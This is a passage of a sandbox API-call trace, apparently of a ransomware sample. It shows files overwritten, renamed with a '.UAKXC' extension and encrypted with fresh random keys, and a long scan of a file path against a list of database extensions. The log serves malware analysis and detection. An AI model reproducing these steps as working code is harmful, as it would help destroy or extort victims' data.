lpOverlapped=0x0 | out: lpBuffer=0x373fd70*, lpNumberOfBytesWritten=0x373fc78*=0x20c, lpOverlapped=0x0) returned 1 [0140.416] WriteFile (in: hFile=0x6c8, lpBuffer=0x373fc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x373fc7c, lpOverlapped=0x0 | out: lpBuffer=0x373fc80*, lpNumberOfBytesWritten=0x373fc7c*=0xa, lpOverlapped=0x0) returned 1 [0140.416] SetEndOfFile (hFile=0x6c8) returned 1 [0140.416] SetFilePointerEx (in: hFile=0x6c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.416] ReadFile (in: hFile=0x6c8, lpBuffer=0x4100000, nNumberOfBytesToRead=0x2fc, lpNumberOfBytesRead=0x373fc88, lpOverlapped=0x0 | out: lpBuffer=0x4100000*, lpNumberOfBytesRead=0x373fc88*=0x2fc, lpOverlapped=0x0) returned 1 [0140.416] SetFilePointerEx (in: hFile=0x6c8, liDistanceToMove=0xfffffd04, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0140.416] WriteFile (in: hFile=0x6c8, lpBuffer=0x4100000*, nNumberOfBytesToWrite=0x2fc, lpNumberOfBytesWritten=0x373fc44, lpOverlapped=0x0 | out: lpBuffer=0x4100000*, lpNumberOfBytesWritten=0x373fc44*=0x2fc, lpOverlapped=0x0) returned 1 [0140.416] CloseHandle (hObject=0x6c8) returned 1 [0140.418] GetProcessHeap () returned 0xea0000 [0140.418] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0xef24d0 [0140.418] lstrcpyW (in: lpString1=0xef24d0, lpString2="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets" | out: lpString1="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets") returned="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets" [0140.418] lstrcatW (in: lpString1="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpString2=".UAKXC" | out: lpString1="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets.UAKXC") returned="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets.UAKXC" [0140.418] MoveFileW (lpExistingFileName="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets" (normalized: "c:\\program files (x86)\\msbuild\\microsoft.office.infopath.targets"), lpNewFileName="C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets.UAKXC" (normalized: "c:\\program files (x86)\\msbuild\\microsoft.office.infopath.targets.uakxc")) returned 1 [0140.420] GetProcessHeap () returned 0xea0000 [0140.420] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef24d0 | out: hHeap=0xea0000) returned 1 [0140.420] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed4d8 | out: hHeap=0xea0000) returned 1 [0140.420] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeecf68 | out: hHeap=0xea0000) returned 1 [0140.420] CryptGenRandom (in: hProv=0xece568, dwLen=0x20, pbBuffer=0x373fd50 | out: pbBuffer=0x373fd50) returned 1 [0140.420] CryptGenRandom (in: hProv=0xece568, dwLen=0x8, pbBuffer=0x373fd48 | out: pbBuffer=0x373fd48) returned 1 [0140.420] CryptEncrypt (in: hKey=0xece4f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x373fd70*, pdwDataLen=0x373fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x373fd70*, pdwDataLen=0x373fc8c*=0x200) returned 1 [0140.421] GetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows" (normalized: "c:\\programdata\\microsoft\\windows")) returned 0x2010 [0140.421] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows" (normalized: "c:\\programdata\\microsoft\\windows"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.421] GetLastError () returned 0x5 [0140.421] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2c60 | out: hHeap=0xea0000) returned 1 [0140.421] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6e20 | out: hHeap=0xea0000) returned 1 [0140.421] CryptGenRandom (in: hProv=0xece568, dwLen=0x20, pbBuffer=0x373fd50 | out: pbBuffer=0x373fd50) returned 1 [0140.421] CryptGenRandom (in: hProv=0xece568, dwLen=0x8, pbBuffer=0x373fd48 | out: pbBuffer=0x373fd48) returned 1 [0140.421] CryptEncrypt (in: hKey=0xece4f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x373fd70*, pdwDataLen=0x373fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x373fd70*, pdwDataLen=0x373fc8c*=0x200) returned 1 [0140.422] GetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows Defender" (normalized: "c:\\programdata\\microsoft\\windows defender")) returned 0x2010 [0140.422] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows Defender" (normalized: "c:\\programdata\\microsoft\\windows defender"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.423] GetLastError () returned 0x5 [0140.423] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec560 | out: hHeap=0xea0000) returned 1 [0140.423] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6d30 | out: hHeap=0xea0000) returned 1 [0140.423] CryptGenRandom (in: hProv=0xece568, dwLen=0x20, pbBuffer=0x373fd50 | out: pbBuffer=0x373fd50) returned 1 [0140.423] CryptGenRandom (in: hProv=0xece568, dwLen=0x8, pbBuffer=0x373fd48 | out: pbBuffer=0x373fd48) returned 1 [0140.423] CryptEncrypt (in: hKey=0xece4f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x373fd70*, pdwDataLen=0x373fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x373fd70*, pdwDataLen=0x373fc8c*=0x200) returned 1 [0140.424] GetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows NT" (normalized: "c:\\programdata\\microsoft\\windows nt")) returned 0x2010 [0140.424] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows NT" (normalized: "c:\\programdata\\microsoft\\windows nt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.424] GetLastError () returned 0x5 [0140.424] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2aa8 | out: hHeap=0xea0000) returned 1 [0140.424] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6d08 | out: hHeap=0xea0000) returned 1 [0140.424] Sleep (dwMilliseconds=0x1f4) [0141.032] CryptGenRandom (in: hProv=0xece568, dwLen=0x20, pbBuffer=0x373fd50 | out: pbBuffer=0x373fd50) returned 1 [0141.032] CryptGenRandom (in: hProv=0xece568, dwLen=0x8, pbBuffer=0x373fd48 | out: pbBuffer=0x373fd48) returned 1 [0141.032] CryptEncrypt (in: hKey=0xece4f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x373fd70*, pdwDataLen=0x373fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x373fd70*, pdwDataLen=0x373fc8c*=0x200) returned 1 [0141.034] GetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.outlook.14.1033.hxn")) returned 0x2022 [0141.088] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.outlook.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0141.088] GetLastError () returned 0x0 [0141.088] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x373fc88 | out: lpFileSize=0x373fc88*=338) returned 1 [0141.089] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".4dd") returned 0x0 [0141.089] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".4dl") returned 0x0 [0141.089] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".accdb") returned 0x0 [0141.089] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".accdc") returned 0x0 [0141.089] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".accde") returned 0x0 [0141.089] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".accdr") returned 0x0 [0141.089] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".accdt") returned 0x0 [0141.089] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".accft") returned 0x0 [0141.089] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".adb") returned 0x0 [0141.089] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".ade") returned 0x0 [0141.089] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".adf") returned 0x0 [0141.089] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".adp") returned 0x0 [0141.089] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".arc") returned 0x0 [0141.089] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".ora") returned 0x0 [0141.089] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".alf") returned 0x0 [0141.089] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".ask") returned 0x0 [0141.089] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".btr") returned 0x0 [0141.089] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".bdf") returned 0x0 [0141.089] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".cat") returned 0x0 [0141.090] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".cdb") returned 0x0 [0141.090] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".ckp") returned 0x0 [0141.090] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".cma") returned 0x0 [0141.090] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".cpd") returned 0x0 [0141.090] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".dacpac") returned 0x0 [0141.090] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".dad") returned 0x0 [0141.090] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".dadiagrams") returned 0x0 [0141.090] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".daschema") returned 0x0 [0141.090] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".db") returned 0x0 [0141.090] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".db-shm") returned 0x0 [0141.090] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".db-wal") returned 0x0 [0141.090] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".db3") returned 0x0 [0141.090] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".dbc") returned 0x0 [0141.090] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".dbf") returned 0x0 [0141.090] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".dbs") returned 0x0 [0141.090] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".dbt") returned 0x0 [0141.090] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".dbv") returned 0x0 [0141.090] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".dbx") returned 0x0 [0141.090] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".dcb") returned 0x0 [0141.090] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".dct") returned 0x0 [0141.090] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".dcx") returned 0x0 [0141.091] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".ddl") returned 0x0 [0141.091] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".dlis") returned 0x0 [0141.091] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".dp1") returned 0x0 [0141.091] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".dqy") returned 0x0 [0141.091] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".dsk") returned 0x0 [0141.091] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".dsn") returned 0x0 [0141.091] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".dtsx") returned 0x0 [0141.091] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".dxl") returned 0x0 [0141.091] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".eco") returned 0x0 [0141.091] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".ecx") returned 0x0 [0141.091] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".edb") returned 0x0 [0141.091] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".epim") returned 0x0 [0141.091] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".exb") returned 0x0 [0141.091] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".fcd") returned 0x0 [0141.091] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".fdb") returned 0x0 [0141.091] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".fic") returned 0x0 [0141.091] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".fmp") returned 0x0 [0141.091] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".fmp12") returned 0x0 [0141.092] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".fmpsl") returned 0x0 [0141.092] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".fol") returned 0x0 [0141.092] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".fp3") returned 0x0 [0141.092] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".fp4") returned 0x0 [0141.092] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".fp5") returned 0x0 [0141.092] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".fp7") returned 0x0 [0141.092] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".fpt") returned 0x0 [0141.092] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".frm") returned 0x0 [0141.092] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".gdb") returned 0x0 [0141.092] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".grdb") returned 0x0 [0141.092] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".gwi") returned 0x0 [0141.092] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".hdb") returned 0x0 [0141.092] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".his") returned 0x0 [0141.092] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".ib") returned 0x0 [0141.092] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".idb") returned 0x0 [0141.092] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".ihx") returned 0x0 [0141.092] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".itdb") returned 0x0 [0141.092] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".itw") returned 0x0 [0141.092] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".jet") returned 0x0 [0141.092] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".jtx") returned 0x0 [0141.093] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".kdb") returned 0x0 [0141.093] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".kexi") returned 0x0 [0141.093] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".kexic") returned 0x0 [0141.093] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".kexis") returned 0x0 [0141.093] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".lgc") returned 0x0 [0141.093] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".lwx") returned 0x0 [0141.093] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".maf") returned 0x0 [0141.093] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".maq") returned 0x0 [0141.093] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".mar") returned 0x0 [0141.093] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".mas") returned 0x0 [0141.093] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".mav") returned 0x0 [0141.093] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".mdb") returned 0x0 [0141.093] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".mdf") returned 0x0 [0141.093] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".mpd") returned 0x0 [0141.093] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".mrg") returned 0x0 [0141.093] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".mud") returned 0x0 [0141.093] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".mwb") returned 0x0 [0141.093] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".myd") returned 0x0 [0141.093] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".ndf") returned 0x0 [0141.093] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".nnt") returned 0x0 [0141.094] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".nrmlib") returned 0x0 [0141.094] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".ns2") returned 0x0 [0141.094] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".ns3") returned 0x0 [0141.094] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".ns4") returned 0x0 [0141.094] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".nsf") returned 0x0 [0141.094] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".nv") returned 0x0 [0141.094] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".nv2") returned 0x0 [0141.094] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".nwdb") returned 0x0 [0141.094] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".nyf") returned 0x0 [0141.094] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".odb") returned 0x0 [0141.094] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".oqy") returned 0x0 [0141.094] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".orx") returned 0x0 [0141.094] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".owc") returned 0x0 [0141.094] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".p96") returned 0x0 [0141.094] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".p97") returned 0x0 [0141.095] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".pan") returned 0x0 [0141.095] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".pdb") returned 0x0 [0141.095] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".pdm") returned 0x0 [0141.095] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".pnz") returned 0x0 [0141.095] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".qry") returned 0x0 [0141.095] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".qvd") returned 0x0 [0141.095] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".rbf") returned 0x0 [0141.095] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".rctd") returned 0x0 [0141.095] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".rod") returned 0x0 [0141.095] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".rodx") returned 0x0 [0141.095] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".rpd") returned 0x0 [0141.095] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".rsd") returned 0x0 [0141.095] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".sas7bdat") returned 0x0 [0141.095] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".sbf") returned 0x0 [0141.095] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".scx") returned 0x0 [0141.095] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".sdb") returned 0x0 [0141.095] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".sdc") returned 0x0 [0141.095] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".sdf") returned 0x0 [0141.095] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".sis") returned 0x0 [0141.095] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".spq") returned 0x0 [0141.096] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".sql") returned 0x0 [0141.096] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".sqlite") returned 0x0 [0141.096] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".sqlite3") returned 0x0 [0141.096] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".sqlitedb") returned 0x0 [0141.096] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".te") returned 0x0 [0141.096] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpSrch=".temx") returned 0x0 